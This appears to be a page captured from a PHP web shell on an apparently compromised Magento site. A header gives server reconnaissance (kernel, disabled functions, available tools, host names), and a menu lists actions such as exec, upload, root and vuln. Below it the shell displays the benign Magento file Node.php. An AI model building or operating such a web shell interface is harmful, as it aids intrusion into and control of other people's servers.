Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 08:05:43
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Data/Tree/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Data/Tree/Node.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Data\Tree; use Magento\Framework\Data\Tree; use Magento\Framework\Data\Tree\Node\Collection; /** * Data tree node * * @api * @author Magento Core Team <core@magentocommerce.com> * @since 100.0.2 */ class Node extends \Magento\Framework\DataObject { /** * Parent node * * @var Node */ protected $_parent; /** * Main tree object * * @var Tree */ protected $_tree; /** * Child nodes * * @var Collection */ protected $_childNodes; /** * Node ID field name * * @var string */ protected $_idField; /** * Data tree node constructor * * @param array $data * @param string $idField * @param Tree $tree * @param Node $parent */ public function __construct($data, $idField, $tree, $parent = null) { $this->setTree($tree); $this->setParent($parent); $this->setIdField($idField); $this->setData($data); $this->_childNodes = new Collection($this); } /** * Retrieve node id * * @return mixed */ public function getId() { return $this->getData($this->getIdField()); } /** * Set node id field name * * @param string $idField * @return $this */ public function setIdField($idField) { $this->_idField = $idField; return $this; } /** * Retrieve node id field name * * @return string */ public function getIdField() { return $this->_idField; } /** * Set node tree object * * @param Tree $tree * @return $this */ public function setTree(Tree $tree) { $this->_tree = $tree; return $this; } /** * Retrieve node tree object * * @return Tree */ public function getTree() { return $this->_tree; } /** * Set node parent * * @param Node $parent * @return $this */ public function setParent($parent) { $this->_parent = $parent; return $this; } /** * Retrieve node parent * * @return Tree */ public function getParent() { return $this->_parent; } /** * Check node children * * @return bool */ public function hasChildren() { return $this->_childNodes->count() > 0; } /** * @param mixed $level * @return $this */ public function setLevel($level) { $this->setData('level', $level); return $this; } /** * @param mixed $path * @return $this */ public function setPathId($path) { $this->setData('path_id', $path); return $this; } /** * @param Node $node * @return void * @SuppressWarnings(PHPMD.UnusedFormalParameter) */ public function isChildOf($node) { } /** * Load node children * * @param int $recursionLevel * @return \Magento\Framework\Data\Tree\Node */ public function loadChildren($recursionLevel = 0) { $this->_tree->load($this, $recursionLevel); return $this; } /** * Retrieve node children collection * * @return Collection */ public function getChildren() { return $this->_childNodes; } /** * @param array $nodes * @return array */ public function getAllChildNodes(&$nodes = []) { foreach ($this->_childNodes as $node) { $nodes[$node->getId()] = $node; $node->getAllChildNodes($nodes); } return $nodes; } /** * @return mixed */ public function getLastChild() { return $this->_childNodes->lastNode(); } /** * Add child node * * @param Node $node * @return Node */ public function addChild($node) { $this->_childNodes->add($node); return $this; } /** * @param Node $prevNode * @return $this */ public function appendChild($prevNode = null) { $this->_tree->appendChild($this, $prevNode); return $this; } /** * @param Node $parentNode * @param Node $prevNode * @return $this */ public function moveTo($parentNode, $prevNode = null) { $this->_tree->moveNodeTo($this, $parentNode, $prevNode); return $this; } /** * @param Node $parentNode * @param Node $prevNode * @return $this */ public function copyTo($parentNode, $prevNode = null) { $this->_tree->copyNodeTo($this, $parentNode, $prevNode); return $this; } /** * @param Node $childNode * @return $this */ public function removeChild($childNode) { $this->_childNodes->delete($childNode); return $this; } /** * @param array $prevNodes * @return array */ public function getPath(&$prevNodes = []) { if ($this->_parent) { $prevNodes[] = $this; $this->_parent->getPath($prevNodes); } return $prevNodes; } /** * @return mixed */ public function getIsActive() { return $this->_getData('is_active'); } /** * @return mixed */ public function getName() { return $this->_getData('name'); } }